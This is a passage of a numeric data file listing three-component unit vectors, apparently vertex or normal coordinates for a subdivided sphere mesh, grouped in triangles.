[-0.782811582088,0.269586592913,-0.560828924179],
[-0.65135627985,0.398910075426,-0.645450055599],
[-0.618283927441,0.353819847107,-0.701809465885],
[-0.678621411324,0.327040165663,-0.657660841942],
[-0.700865805149,0.256401896477,-0.665616393089],
[-0.665048420429,0.213841319084,-0.715529501438],
[-0.718357801437,0.188148602843,-0.669747889042],
[-0.678621411324,0.327040165663,-0.657660841942],
[-0.700865805149,0.256401896477,-0.665616393089],
[-0.733673810959,0.298754066229,-0.610302150249],
[-0.520354926586,0.44894811511,-0.726413309574],
[-0.485873311758,0.400663375854,-0.776785671711],
[-0.553625464439,0.378517180681,-0.74177056551],
[-0.379529476166,0.486395716667,-0.787004828453],
[-0.346611320972,0.436200261116,-0.830415487289],
[-0.416404157877,0.419940322638,-0.806385576725],
[-0.450116455555,0.352179646492,-0.820587992668],
[-0.413926929235,0.3044308424,-0.857896447182],
[-0.480284929276,0.284414708614,-0.829719662666],
[-0.416404157877,0.419940322638,-0.806385576725],
[-0.450116455555,0.352179646492,-0.820587992668],
[-0.485873311758,0.400663375854,-0.776785671711],
[-0.627150595188,0.171839639544,-0.759706020355],
[-0.588087081909,0.131048902869,-0.798110127449],
[-0.643326640129,0.108097285032,-0.757922053337],
[-0.506734728813,0.217834427953,-0.834127128124],
[-0.468421578407,0.174905076623,-0.866019308567],
[-0.529480218887,0.153434738517,-0.834331154823],
[-0.548688352108,0.091976031661,-0.830952167511],
[-0.509656965733,0.0549761541188,-0.858619451523],
[-0.564633131027,0.0339771322906,-0.82464236021],
[-0.529480218887,0.153434738517,-0.834331154823],
[-0.548688352108,0.091976031661,-0.830952167511],
[-0.588087081909,0.131048902869,-0.798110127449],
[-0.553625464439,0.378517180681,-0.74177056551],
[-0.582528710365,0.308011889458,-0.752189457417],
[-0.618283927441,0.353819847107,-0.701809465885],
[-0.480284929276,0.284414708614,-0.829719662666],
[-0.506734728813,0.217834427953,-0.834127128124],
[-0.545040607452,0.26241543889,-0.796284377575],
[-0.606988489628,0.238753452897,-0.757998526096],
[-0.627150595188,0.171839639544,-0.759706020355],
[-0.665048420429,0.213841319084,-0.715529501438],
[-0.545040607452,0.26241543889,-0.796284377575],
[-0.606988489628,0.238753452897,-0.757998526096],
[-0.582528710365,0.308011889458,-0.752189457417],
[-0.486395716667,0.787004828453,-0.379529476166],
[-0.535965919495,0.737060189247,-0.411682873964],
[-0.550243675709,0.762617051601,-0.340069264174],
[-0.44894811511,0.726413309574,-0.520354926586],
[-0.495975226164,0.669751524925,-0.552667617798],
[-0.517854511738,0.706037700176,-0.483050197363],
[-0.58378881216,0.680853009224,-0.44230055809],
[-0.628728508949,0.619044244289,-0.470621615648],
[-0.645450055599,0.65135627985,-0.398910075426],
[-0.517854511738,0.706037700176,-0.483050197363],
[-0.58378881216,0.680853009224,-0.44230055809],
[-0.535965919495,0.737060189247,-0.411682873964],
[-0.398910075426,0.645450055599,-0.65135627985],
[-0.44230055809,0.58378881216,-0.680853009224],
[-0.470621615648,0.628728508949,-0.619044244289],
[-0.340069264174,0.550243675709,-0.762617051601],
[-0.379529476166,0.486395716667,-0.787004828453],
[-0.411682873964,0.535965919495,-0.737060189247],
[-0.483050197363,0.517854511738,-0.706037700176],
[-0.520354926586,0.44894811511,-0.726413309574],
[-0.552667617798,0.495975226164,-0.669751524925],
[-0.411682873964,0.535965919495,-0.737060189247],
[-0.483050197363,0.517854511738,-0.706037700176],
[-0.44230055809,0.58378881216,-0.680853009224],
[-0.669751524925,0.552667617798,-0.495975226164],
[-0.706037700176,0.483050197363,-0.517854511738],
[-0.726413309574,0.520354926586,-0.44894811511],
[-0.619044244289,0.470621615648,-0.628728508949],
[-0.65135627985,0.398910075426,-0.645450055599],
[-0.680853009224,0.44230055809,-0.58378881216],
[-0.737060189247,0.411682873964,-0.535965919495],
[-0.762617051601,0.340069264174,-0.550243675709],
[-0.787004828453,0.379529476166,-0.486395716667],
[-0.680853009224,0.44230055809,-0.58378881216],
[-0.737060189247,0.411682873964,-0.535965919495],
[-0.706037700176,0.483050197363,-0.517854511738],
[-0.470621615648,0.628728508949,-0.619044244289],
[-0.540649950504,0.607478022575,-0.581951975822],
[-0.495975226164,0.669751524925,-0.552667617798],
[-0.552667617798,0.495975226164,-0.669751524925],
[-0.619044244289,0.470621615648,-0.628728508949],
[-0.581951975822,0.540649950504,-0.607478022575],
[-0.607478022575,0.581951975822,-0.540649950504],
[-0.669751524925,0.552667617798,-0.495975226164],
[-0.628728508949,0.619044244289,-0.470621615648],
[-0.581951975822,0.540649950504,-0.607478022575],
[-0.607478022575,0.581951975822,-0.540649950504],
[-0.540649950504,0.607478022575,-0.581951975822],
[0.475679844618,0.0,-0.8796184659],
[0.456712335348,0.0568443164229,-0.887796461582],
[0.509656965733,0.0549761541188,-0.858619451523],
[0.360324263573,0.0,-0.932827115059],
[0.334895044565,0.0602079555392,-0.940329909325],
[0.398431301117,0.0586068555713,-0.915323853493],
[0.434652328491,0.117213711143,-0.892938017845],
[0.409316182137,0.180623859167,-0.894335091114],
[0.468421578407,0.174905076623,-0.866019308567],
[0.398431301117,0.0586068555713,-0.915323853493],
[0.434652328491,0.117213711143,-0.892938017845],
[0.456712335348,0.0568443164229,-0.887796461582],
[0.225778326392,0.0,-0.974178731441],
[0.193714544177,0.0626873448491,-0.979053080082],
[0.266443610191,0.0615878328681,-0.961880862713],
[0.0770247355103,0.0,-0.997029185295],
[0.0394601933658,0.0638479366899,-0.997179210186],
[0.117650069296,0.0634539350867,-0.991025745869],
[0.158833146095,0.128498718143,-0.978907585144],
[0.121444880962,0.196501940489,-0.97295331955],
[0.199805602431,0.193975359201,-0.960443258286],
[0.117650069296,0.0634539350867,-0.991025745869],
[0.158833146095,0.128498718143,-0.978907585144],
[0.193714544177,0.0626873448491,-0.979053080082],
[0.380633711815,0.246351331472,-0.891307473183],
[0.348686188459,0.313436716795,-0.883275330067],
[0.413926929235,0.3044308424,-0.857896447182],
[0.239766731858,0.258633822203,-0.935745954514],
[0.202408134937,0.327503234148,-0.922915279865],
[0.277958005667,0.321246802807,-0.905284404755],
[0.313733518124,0.380723625422,-0.869839549065],
[0.276221334934,0.446935534477,-0.85085272789],
[0.346611320972,0.436200261116,-0.830415487289],
[0.277958005667,0.321246802807,-0.905284404755],
[0.313733518124,0.380723625422,-0.869839549065],
[0.348686188459,0.313436716795,-0.883275330067],
[0.266443610191,0.0615878328681,-0.961880862713],
[0.306287169456,0.123895764351,-0.943842172623],
[0.334895044565,0.0602079555392,-0.940329909325],
[0.199805602431,0.193975359201,-0.960443258286],
[0.239766731858,0.258633822203,-0.935745954514],
[0.274516820908,0.190361812711,-0.942551255226],
[0.34457308054,0.185843646526,-0.920180141926],
[0.380633711815,0.246351331472,-0.891307473183],
[0.409316182137,0.180623859167,-0.894335091114],
[0.274516820908,0.190361812711,-0.942551255226],
[0.34457308054,0.185843646526,-0.920180141926],
[0.306287169456,0.123895764351,-0.943842172623],
[-0.0770247355103,0.0,-0.997029185295],
[-0.117650069296,0.0634539350867,-0.991025745869],
[-0.0394601933658,0.0638479366899,-0.997179210186],
[-0.225778326392,0.0,-0.974178731441],
[-0.266443610191,0.0615878328681,-0.961880862713],
[-0.193714544177,0.0626873448491,-0.979053080082],
[-0.158833146095,0.128498718143,-0.978907585144],
[-0.199805602431,0.193975359201,-0.960443258286],
[-0.121444880962,0.196501940489,-0.97295331955],
[-0.193714544177,0.0626873448491,-0.979053080082],
[-0.158833146095,0.128498718143,-0.978907585144],
[-0.117650069296,0.0634539350867,-0.991025745869],
[-0.360324263573,0.0,-0.932827115059],
[-0.398431301117,0.0586068555713,-0.915323853493],
[-0.334895044565,0.0602079555392,-0.940329909325],
[-0.475679844618,0.0,-0.8796184659],
[-0.509656965733,0.0549761541188,-0.858619451523],
[-0.456712335348,0.0568443164229,-0.887796461582],
[-0.434652328491,0.117213711143,-0.892938017845],
[-0.468421578407,0.174905076623,-0.866019308567],
[-0.409316182137,0.180623859167,-0.894335091114],
[-0.456712335348,0.0568443164229,-0.887796461582],
[-0.434652328491,0.117213711143,-0.892938017845],
[-0.398431301117,0.0586068555713,-0.915323853493],
[-0.239766731858,0.258633822203,-0.935745954514],
[-0.277958005667,0.321246802807,-0.905284404755],
[-0.202408134937,0.327503234148,-0.922915279865],
[-0.380633711815,0.246351331472,-0.891307473183],
[-0.413926929235,0.3044308424,-0.857896447182],
[-0.348686188459,0.313436716795,-0.883275330067],
[-0.313733518124,0.380723625422,-0.869839549065],
[-0.346611320972,0.436200261116,-0.830415487289],
[-0.276221334934,0.446935534477,-0.85085272789],
[-0.348686188459,0.313436716795,-0.883275330067],
[-0.313733518124,0.380723625422,-0.869839549065],
[-0.277958005667,0.321246802807,-0.905284404755],
[-0.334895044565,0.0602079555392,-0.940329909325],
[-0.306287169456,0.123895764351,-0.943842172623],
[-0.266443610191,0.0615878328681,-0.961880862713],
[-0.409316182137,0.180623859167,-0.894335091114],
[-0.380633711815,0.246351331472,-0.891307473183],
[-0.34457308054,0.185843646526,-0.920180141926],
[-0.274516820908,0.190361812711,-0.942551255226],
[-0.239766731858,0.258633822203,-0.935745954514],
[-0.199805602431,0.193975359201,-0.960443258286],
[-0.34457308054,0.185843646526,-0.920180141926],
[-0.274516820908,0.190361812711,-0.942551255226],
[-0.306287169456,0.123895764351,-0.943842172623],
[0.236761152744,0.510783493519,-0.826465010643],
[0.196083456278,0.571085453033,-0.797127783298],
[0.269586592913,0.560828924179,-0.782811582088],
[0.0809632539749,0.524005174637,-0.847858190536],
[0.0399611219764,0.581926107407,-0.81225925684],
[0.119124859571,0.578244268894,-0.807120084763],
[0.154971644282,0.62687343359,-0.763553202152],
[0.114190116525,0.677466154099,-0.726636230946],
[0.188148602843,0.669747889042,-0.718357801437],
[0.119124859571,0.578244268894,-0.807120084763],
[0.154971644282,0.62687343359,-0.763553202152],
[0.196083456278,0.571085453033,-0.797127783298],
[-0.0809632539749,0.524005174637,-0.847858190536],
[-0.119124859571,0.578244268894,-0.807120084763],
[-0.0399611219764,0.581926107407,-0.81225925684],
[-0.236761152744,0.510783493519,-0.826465010643],
[-0.269586592913,0.560828924179,-0.782811582088],
[-0.196083456278,0.571085453033,-0.797127783298],
[-0.154971644282,0.62687343359,-0.763553202152],
[-0.188148602843,0.669747889042,-0.718357801437],
[-0.114190116525,0.677466154099,-0.726636230946],
[-0.196083456278,0.571085453033,-0.797127783298],
[-0.154971644282,0.62687343359,-0.763553202152],
[-0.119124859571,0.578244268894,-0.807120084763],
[0.0744211226702,0.722495436668,-0.687358558178],
[0.0362210273743,0.761889100075,-0.646693944931],
[0.108097285032,0.757922053337,-0.643326640129],
[-0.0744211226702,0.722495436668,-0.687358558178],
[-0.108097285032,0.757922053337,-0.643326640129],
[-0.0362210273743,0.761889100075,-0.646693944931],
[0.0,0.79582041502,-0.605532705784],
[-0.0339771322906,0.82464236021,-0.564633131027],
[0.0339771322906,0.82464236021,-0.564633131027],
[-0.0362210273743,0.761889100075,-0.646693944931],
[0.0,0.79582041502,-0.605532705784],
[0.0362210273743,0.761889100075,-0.646693944931],
[-0.0399611219764,0.581926107407,-0.81225925684],
[0.0,0.634539365768,-0.772890508175],
[0.0399611219764,0.581926107407,-0.81225925684],
[-0.114190116525,0.677466154099,-0.726636230946],
[-0.0744211226702,0.722495436668,-0.687358558178],
[-0.0382858961821,0.68142670393,-0.730884253979],
[0.0382858961821,0.68142670393,-0.730884253979],
[0.0744211226702,0.722495436668,-0.687358558178],
[0.114190116525,0.677466154099,-0.726636230946],
[-0.0382858961821,0.68142670393,-0.730884253979],
[0.0382858961821,0.68142670393,-0.730884253979],
[0.0,0.634539365768,-0.772890508175],
[-0.0394601933658,0.0638479366899,-0.997179210186],
[0.0,0.130150929093,-0.991494178772],
[0.0394601933658,0.0638479366899,-0.997179210186],
[-0.121444880962,0.196501940489,-0.97295331955],
[-0.0820460245013,0.265506535769,-0.960611641407],
[-0.0407496243715,0.197802826762,-0.979394435883],
[0.0407496243715,0.197802826762,-0.979394435883],
[0.0820460245013,0.265506535769,-0.960611641407],
[0.121444880962,0.196501940489,-0.97295331955],
[-0.0407496243715,0.197802826762,-0.979394435883],
[0.0407496243715,0.197802826762,-0.979394435883],
[0.0,0.130150929093,-0.991494178772],
[-0.202408134937,0.327503234148,-0.922915279865],
[-0.162998497486,0.395605653524,-0.903840482235],
[-0.123069040477,0.33188316226,-0.935258030891],
[-0.276221334934,0.446935534477,-0.85085272789],
[-0.236761152744,0.510783493519,-0.826465010643],
[-0.20109423995,0.455528259277,-0.867211103439],
[-0.122248865664,0.461539924145,-0.878655850887],
[-0.0809632539749,0.524005174637,-0.847858190536],
[-0.0410230122507,0.464636415243,-0.88455080986],
[-0.20109423995,0.455528259277,-0.867211103439],
[-0.122248865664,0.461539924145,-0.878655850887],
[-0.162998497486,0.395605653524,-0.903840482235],
[0.123069040477,0.33188316226,-0.935258030891],
[0.162998497486,0.395605653524,-0.903840482235],
[0.202408134937,0.327503234148,-0.922915279865],
[0.0410230122507,0.464636415243,-0.88455080986],
[0.0809632539749,0.524005174637,-0.847858190536],
[0.122248865664,0.461539924145,-0.878655850887],
[0.20109423995,0.455528259277,-0.867211103439],
[0.236761152744,0.510783493519,-0.826465010643],
[0.276221334934,0.446935534477,-0.85085272789],
[0.122248865664,0.461539924145,-0.878655850887],
[0.20109423995,0.455528259277,-0.867211103439],
[0.162998497486,0.395605653524,-0.903840482235],
[-0.123069040477,0.33188316226,-0.935258030891],
[-0.04130198434,0.334140062332,-0.941618084908],
[-0.0820460245013,0.265506535769,-0.960611641407],
[-0.0410230122507,0.464636415243,-0.88455080986],
[0.0410230122507,0.464636415243,-0.88455080986],
[0.0,0.400968074799,-0.916092038155],
[0.04130198434,0.334140062332,-0.941618084908],
[0.123069040477,0.33188316226,-0.935258030891],
[0.0820460245013,0.265506535769,-0.960611641407],
[0.0,0.400968074799,-0.916092038155],
[0.04130198434,0.334140062332,-0.941618084908],
[-0.04130198434,0.334140062332,-0.941618084908],
[0.509656965733,0.0549761541188,-0.858619451523],
[0.548688352108,0.091976031661,-0.830952167511],
[0.564633131027,0.0339771322906,-0.82464236021],
[0.468421578407,0.174905076623,-0.866019308567],
[0.506734728813,0.217834427953,-0.834127128124],
[0.529480218887,0.153434738517,-0.834331154823],
[0.588087081909,0.131048902869,-0.798110127449],
[0.627150595188,0.171839639544,-0.759706020355],
[0.643326640129,0.108097285032,-0.757922053337],
[0.529480218887,0.153434738517,-0.834331154823],
[0.588087081909,0.131048902869,-0.798110127449],
[0.548688352108,0.091976031661,-0.830952167511],
[0.413926929235,0.3044308424,-0.857896447182],
[0.450116455555,0.352179646492,-0.820587992668],
[0.480284929276,0.284414708614,-0.829719662666],
[0.346611320972,0.436200261116,-0.830415487289],
[0.379529476166,0.486395716667,-0.787004828453],
[0.416404157877,0.419940322638,-0.806385576725],
[0.485873311758,0.400663375854,-0.776785671711],
[0.520354926586,0.44894811511,-0.726413309574],
[0.553625464439,0.378517180681,-0.74177056551],
[0.416404157877,0.419940322638,-0.806385576725],
[0.485873311758,0.400663375854,-0.776785671711],
[0.450116455555,0.352179646492,-0.820587992668],
[0.665048420429,0.213841319084,-0.715529501438],
[0.700865805149,0.256401896477,-0.665616393089],
[0.718357801437,0.188148602843,-0.669747889042],
[0.618283927441,0.353819847107,-0.701809465885],
[0.65135627985,0.398910075426,-0.645450055599],
[0.678621411324,0.327040165663,-0.657660841942],
[0.733673810959,0.298754066229,-0.610302150249],
[0.762617051601,0.340069264174,-0.550243675709],
[0.782811582088,0.269586592913,-0.560828924179],
[0.678621411324,0.327040165663,-0.657660841942],
[0.733673810959,0.298754066229,-0.610302150249],
[0.700865805149,0.256401896477,-0.665616393089],
[0.480284929276,0.284414708614,-0.829719662666],
[0.545040607452,0.26241543889,-0.796284377575],
[0.506734728813,0.217834427953,-0.834127128124],
[0.553625464439,0.378517180681,-0.74177056551],
[0.618283927441,0.353819847107,-0.701809465885],
[0.582528710365,0.308011889458,-0.752189457417],
[0.606988489628,0.238753452897,-0.757998526096],
[0.665048420429,0.213841319084,-0.715529501438],
[0.627150595188,0.171839639544,-0.759706020355],
[0.582528710365,0.308011889458,-0.752189457417],
[0.606988489628,0.238753452897,-0.757998526096],
[0.545040607452,0.26241543889,-0.796284377575],
[0.269586592913,0.560828924179,-0.782811582088],
[0.298754066229,0.610302150249,-0.733673810959],
[0.340069264174,0.550243675709,-0.762617051601],
[0.188148602843,0.669747889042,-0.718357801437],
[0.213841319084,0.715529501438,-0.665048420429],
[0.256401896477,0.665616393089,-0.700865805149],
[0.327040165663,0.657660841942,-0.678621411324],
[0.353819847107,0.701809465885,-0.618283927441],
[0.398910075426,0.645450055599,-0.65135627985],
[0.256401896477,0.665616393089,-0.700865805149],
[0.327040165663,0.657660841942,-0.678621411324],
[0.298754066229,0.610302150249,-0.733673810959],
[0.108097285032,0.757922053337,-0.643326640129],
[0.131048902869,0.798110127449,-0.588087081909],
[0.171839639544,0.759706020355,-0.627150595188],
[0.0339771322906,0.82464236021,-0.564633131027],
[0.0549761541188,0.858619451523,-0.509656965733],
[0.091976031661,0.830952167511,-0.548688352108],
[0.153434738517,0.834331154823,-0.529480218887],
[0.174905076623,0.866019308567,-0.468421578407],
[0.217834427953,0.834127128124,-0.506734728813],
[0.091976031661,0.830952167511,-0.548688352108],
[0.153434738517,0.834331154823,-0.529480218887],
[0.131048902869,0.798110127449,-0.588087081909],
[0.378517180681,0.74177056551,-0.553625464439],
[0.400663375854,0.776785671711,-0.485873311758],
[0.44894811511,0.726413309574,-0.520354926586],
[0.284414708614,0.829719662666,-0.480284929276],
[0.3044308424,0.857896447182,-0.413926929235],
[0.352179646492,0.820587992668,-0.450116455555],
[0.419940322638,0.806385576725,-0.416404157877],
[0.436200261116,0.830415487289,-0.346611320972],
[0.486395716667,0.787004828453,-0.379529476166],
[0.352179646492,0.820587992668,-0.450116455555],
[0.419940322638,0.806385576725,-0.416404157877],
[0.400663375854,0.776785671711,-0.485873311758],
[0.171839639544,0.759706020355,-0.627150595188],
[0.238753452897,0.757998526096,-0.606988489628],
[0.213841319084,0.715529501438,-0.665048420429],
[0.217834427953,0.834127128124,-0.506734728813],
[0.284414708614,0.829719662666,-0.480284929276],
[0.26241543889,0.796284377575,-0.545040607452],
[0.308011889458,0.752189457417,-0.582528710365],
[0.378517180681,0.74177056551,-0.553625464439],
[0.353819847107,0.701809465885,-0.618283927441],
[0.26241543889,0.796284377575,-0.545040607452],
[0.308011889458,0.752189457417,-0.582528710365],
[0.238753452897,0.757998526096,-0.606988489628],
[0.787004828453,0.379529476166,-0.486395716667],
[0.806385576725,0.416404157877,-0.419940322638],
[0.830415487289,0.346611320972,-0.436200261116],
[0.726413309574,0.520354926586,-0.44894811511],
[0.74177056551,0.553625464439,-0.378517180681],
[0.776785671711,0.485873311758,-0.400663375854],
[0.820587992668,0.450116455555,-0.352179646492],
[0.829719662666,0.480284929276,-0.284414708614],
[0.857896447182,0.413926929235,-0.3044308424],
[0.776785671711,0.485873311758,-0.400663375854],
[0.820587992668,0.450116455555,-0.352179646492],
[0.806385576725,0.416404157877,-0.419940322638],
[0.645450055599,0.65135627985,-0.398910075426],
[0.657660841942,0.678621411324,-0.327040165663],
[0.701809465885,0.618283927441,-0.353819847107],
[0.550243675709,0.762617051601,-0.340069264174],
[0.560828924179,0.782811582088,-0.269586592913],
[0.610302150249,0.733673810959,-0.298754066229],
[0.665616393089,0.700865805149,-0.256401896477],
[0.669747889042,0.718357801437,-0.188148602843],
[0.715529501438,0.665048420429,-0.213841319084],
[0.610302150249,0.733673810959,-0.298754066229],
[0.665616393089,0.700865805149,-0.256401896477],
[0.657660841942,0.678621411324,-0.327040165663],
[0.834127128124,0.506734728813,-0.217834427953],
[0.834331154823,0.529480218887,-0.153434738517],
[0.866019308567,0.468421578407,-0.174905076623],
[0.759706020355,0.627150595188,-0.171839639544],
[0.757922053337,0.643326640129,-0.108097285032],
[0.798110127449,0.588087081909,-0.131048902869],
[0.830952167511,0.548688352108,-0.091976031661],
[0.82464236021,0.564633131027,-0.0339771322906],
[0.858619451523,0.509656965733,-0.0549761541188],
[0.798110127449,0.588087081909,-0.131048902869],
[0.830952167511,0.548688352108,-0.091976031661],
[0.834331154823,0.529480218887,-0.153434738517],
[0.701809465885,0.618283927441,-0.353819847107],
[0.752189457417,0.582528710365,-0.308011889458],
[0.74177056551,0.553625464439,-0.378517180681],
[0.715529501438,0.665048420429,-0.213841319084],
[0.759706020355,0.627150595188,-0.171839639544],
[0.757998526096,0.606988489628,-0.238753452897],
[0.796284377575,0.545040607452,-0.26241543889],
[0.834127128124,0.506734728813,-0.217834427953],
[0.829719662666,0.480284929276,-0.284414708614],
[0.757998526096,0.606988489628,-0.238753452897],
[0.796284377575,0.545040607452,-0.26241543889],
[0.752189457417,0.582528710365,-0.308011889458],
[0.340069264174,0.550243675709,-0.762617051601],
[0.411682873964,0.535965919495,-0.737060189247],
[0.379529476166,0.486395716667,-0.787004828453],
[0.398910075426,0.645450055599,-0.65135627985],
[0.470621615648,0.628728508949,-0.619044244289],
[0.44230055809,0.58378881216,-0.680853009224],
[0.483050197363,0.517854511738,-0.706037700176],
[0.552667617798,0.495975226164,-0.669751524925],
[0.520354926586,0.44894811511,-0.726413309574],
[0.44230055809,0.58378881216,-0.680853009224],
[0.483050197363,0.517854511738,-0.706037700176],
[0.411682873964,0.535965919495,-0.737060189247],
[0.44894811511,0.726413309574,-0.520354926586],
[0.517854511738,0.706037700176,-0.483050197363],
[0.495975226164,0.669751524925,-0.552667617798],
[0.486395716667,0.787004828453,-0.379529476166],
[0.550243675709,0.762617051601,-0.340069264174],
[0.535965919495,0.737060189247,-0.411682873964],
[0.58378881216,0.680853009224,-0.44230055809],
[0.645450055599,0.65135627985,-0.398910075426],
[0.628728508949,0.619044244289,-0.470621615648],
[0.535965919495,0.737060189247,-0.411682873964],
[0.58378881216,0.680853009224,-0.44230055809],
[0.517854511738,0.706037700176,-0.483050197363],
[0.619044244289,0.470621615648,-0.628728508949],
[0.680853009224,0.44230055809,-0.58378881216],
[0.65135627985,0.398910075426,-0.645450055599],
[0.669751524925,0.552667617798,-0.495975226164],
[0.726413309574,0.520354926586,-0.44894811511],
[0.706037700176,0.483050197363,-0.517854511738],
[0.737060189247,0.411682873964,-0.535965919495],
[0.787004828453,0.379529476166,-0.486395716667],
[0.762617051601,0.340069264174,-0.550243675709],
[0.706037700176,0.483050197363,-0.517854511738],
[0.737060189247,0.411682873964,-0.535965919495],
[0.680853009224,0.44230055809,-0.58378881216],
[0.495975226164,0.669751524925,-0.552667617798],
[0.540649950504,0.607478022575,-0.581951975822],
[0.470621615648,0.628728508949,-0.619044244289],
[0.628728508949,0.619044244289,-0.470621615648],
[0.669751524925,0.552667617798,-0.495975226164],
[0.607478022575,0.581951975822,-0.540649950504],
[0.581951975822,0.540649950504,-0.607478022575],
[0.619044244289,0.470621615648,-0.628728508949],
[0.552667617798,0.495975226164,-0.669751524925],
[0.607478022575,0.581951975822,-0.540649950504],
[0.581951975822,0.540649950504,-0.607478022575],
[0.540649950504,0.607478022575,-0.581951975822],
[0.82464236021,0.564633131027,-0.0339771322906],
[0.79582041502,0.605532705784,0.0],
[0.82464236021,0.564633131027,0.0339771322906],
[0.757922053337,0.643326640129,-0.108097285032],
[0.722495436668,0.687358558178,-0.0744211226702],
[0.761889100075,0.646693944931,-0.0362210273743],
[0.761889100075,0.646693944931,0.0362210273743],
[0.722495436668,0.687358558178,0.0744211226702],
[0.757922053337,0.643326640129,0.108097285032],
[0.761889100075,0.646693944931,-0.0362210273743],
[0.761889100075,0.646693944931,0.0362210273743],
[0.79582041502,0.605532705784,0.0],
[0.669747889042,0.718357801437,-0.188148602843],
[0.62687343359,0.763553202152,-0.154971644282],
[0.677466154099,0.726636230946,-0.114190116525],
[0.560828924179,0.782811582088,-0.269586592913],
[0.510783493519,0.826465010643,-0.236761152744],
[0.571085453033,0.797127783298,-0.196083456278],
[0.578244268894,0.807120084763,-0.119124859571],
[0.524005174637,0.847858190536,-0.0809632539749],
[0.581926107407,0.81225925684,-0.0399611219764],
[0.571085453033,0.797127783298,-0.196083456278],
[0.578244268894,0.807120084763,-0.119124859571],
[0.62687343359,0.763553202152,-0.154971644282],
[0.677466154099,0.726636230946,0.114190116525],
[0.62687343359,0.763553202152,0.154971644282],
[0.669747889042,0.718357801437,0.188148602843],
[0.581926107407,0.81225925684,0.0399611219764],
[0.524005174637,0.847858190536,0.0809632539749],
[0.578244268894,0.807120084763,0.119124859571],
[0.571085453033,0.797127783298,0.196083456278],
[0.510783493519,0.826465010643,0.236761152744],
[0.560828924179,0.782811582088,0.269586592913],
[0.578244268894,0.807120084763,0.119124859571],
[0.571085453033,0.797127783298,0.196083456278],
[0.62687343359,0.763553202152,0.154971644282],
[0.677466154099,0.726636230946,-0.114190116525],
[0.68142670393,0.730884253979,-0.0382858961821],
[0.722495436668,0.687358558178,-0.0744211226702],
[0.581926107407,0.81225925684,-0.0399611219764],
[0.581926107407,0.81225925684,0.0399611219764],
[0.634539365768,0.772890508175,0.0],
[0.68142670393,0.730884253979,0.0382858961821],
[0.677466154099,0.726636230946,0.114190116525],
[0.722495436668,0.687358558178,0.0744211226702],
[0.634539365768,0.772890508175,0.0],
[0.68142670393,0.730884253979,0.0382858961821],
[0.68142670393,0.730884253979,-0.0382858961821],
[0.436200261116,0.830415487289,-0.346611320972],
[0.380723625422,0.869839549065,-0.313733518124],
[0.446935534477,0.85085272789,-0.276221334934],
[0.3044308424,0.857896447182,-0.413926929235],
[0.246351331472,0.891307473183,-0.380633711815],
[0.313436716795,0.883275330067,-0.348686188459],
[0.321246802807,0.905284404755,-0.277958005667],
[0.258633822203,0.935745954514,-0.239766731858],
[0.327503234148,0.922915279865,-0.202408134937],
[0.313436716795,0.883275330067,-0.348686188459],
[0.321246802807,0.905284404755,-0.277958005667],
[0.380723625422,0.869839549065,-0.313733518124],
[0.174905076623,0.866019308567,-0.468421578407],
[0.117213711143,0.892938017845,-0.434652328491],
[0.180623859167,0.894335091114,-0.409316182137],
[0.0549761541188,0.858619451523,-0.509656965733],
[0.0,0.8796184659,-0.475679844618],
[0.0568443164229,0.887796461582,-0.456712335348],
[0.0586068555713,0.915323853493,-0.398431301117],
[0.0,0.932827115059,-0.360324263573],
[0.0602079555392,0.940329909325,-0.334895044565],
[0.0568443164229,0.887796461582,-0.456712335348],
[0.0586068555713,0.915323853493,-0.398431301117],
[0.117213711143,0.892938017845,-0.434652328491],
[0.193975359201,0.960443258286,-0.199805602431],
[0.128498718143,0.978907585144,-0.158833146095],
[0.196501940489,0.97295331955,-0.121444880962],
[0.0615878328681,0.961880862713,-0.266443610191],
[0.0,0.974178731441,-0.225778326392],
[0.0626873448491,0.979053080082,-0.193714544177],
[0.0634539350867,0.991025745869,-0.117650069296],
[0.0,0.997029185295,-0.0770247355103],
[0.0638479366899,0.997179210186,-0.0394601933658],
[0.0626873448491,0.979053080082,-0.193714544177],
[0.0634539350867,0.991025745869,-0.117650069296],
[0.128498718143,0.978907585144,-0.158833146095],
[0.180623859167,0.894335091114,-0.409316182137],
[0.185843646526,0.920180141926,-0.34457308054],
[0.246351331472,0.891307473183,-0.380633711815],
[0.0602079555392,0.940329909325,-0.334895044565],
[0.0615878328681,0.961880862713,-0.266443610191],
[0.123895764351,0.943842172623,-0.306287169456],
[0.190361812711,0.942551255226,-0.274516820908],
[0.193975359201,0.960443258286,-0.199805602431],
[0.258633822203,0.935745954514,-0.239766731858],
[0.123895764351,0.943842172623,-0.306287169456],
[0.190361812711,0.942551255226,-0.274516820908],
[0.185843646526,0.920180141926,-0.34457308054],
[0.446935534477,0.85085272789,0.276221334934],
[0.380723625422,0.869839549065,0.313733518124],
[0.436200261116,0.830415487289,0.346611320972],
[0.327503234148,0.922915279865,0.202408134937],
[0.258633822203,0.935745954514,0.239766731858],
[0.321246802807,0.905284404755,0.277958005667],
[0.313436716795,0.883275330067,0.348686188459],
[0.246351331472,0.891307473183,0.380633711815],
[0.3044308424,0.857896447182,0.413926929235],
[0.321246802807,0.905284404755,0.277958005667],
[0.313436716795,0.883275330067,0.348686188459],
[0.380723625422,0.869839549065,0.313733518124],
[0.196501940489,0.97295331955,0.121444880962],
[0.128498718143,0.978907585144,0.158833146095],
[0.193975359201,0.960443258286,0.199805602431],
[0.0638479366899,0.997179210186,0.0394601933658],
[0.0,0.997029185295,0.0770247355103],
[0.0634539350867,0.991025745869,0.117650069296],
[0.0626873448491,0.979053080082,0.193714544177],
[0.0,0.974178731441,0.225778326392],
[0.0615878328681,0.961880862713,0.266443610191],
[0.0634539350867,0.991025745869,0.117650069296],
[0.0626873448491,0.979053080082,0.193714544177],
[0.128498718143,0.978907585144,0.158833146095],
[0.180623859167,0.894335091114,0.409316182137],
[0.117213711143,0.892938017845,0.434652328491],
[0.174905076623,0.866019308567,0.468421578407],
[0.0602079555392,0.940329909325,0.334895044565],
[0.0,0.932827115059,0.360324263573],
[0.0586068555713,0.915323853493,0.398431301117],
[0.0568443164229,0.887796461582,0.456712335348],
[0.0,0.8796184659,0.475679844618],
[0.0549761541188,0.858619451523,0.509656965733],
[0.0586068555713,0.915323853493,0.398431301117],
[0.0568443164229,0.887796461582,0.456712335348],
[0.117213711143,0.892938017845,0.434652328491],
[0.193975359201,0.960443258286,0.199805602431],
[0.190361812711,0.942551255226,0.274516820908],
[0.258633822203,0.935745954514,0.239766731858],
[0.0615878328681,0.961880862713,0.266443610191],
[0.0602079555392,0.940329909325,0.334895044565],
[0.123895764351,0.943842172623,0.306287169456],
[0.185843646526,0.920180141926,0.34457308054],
[0.180623859167,0.894335091114,0.409316182137],
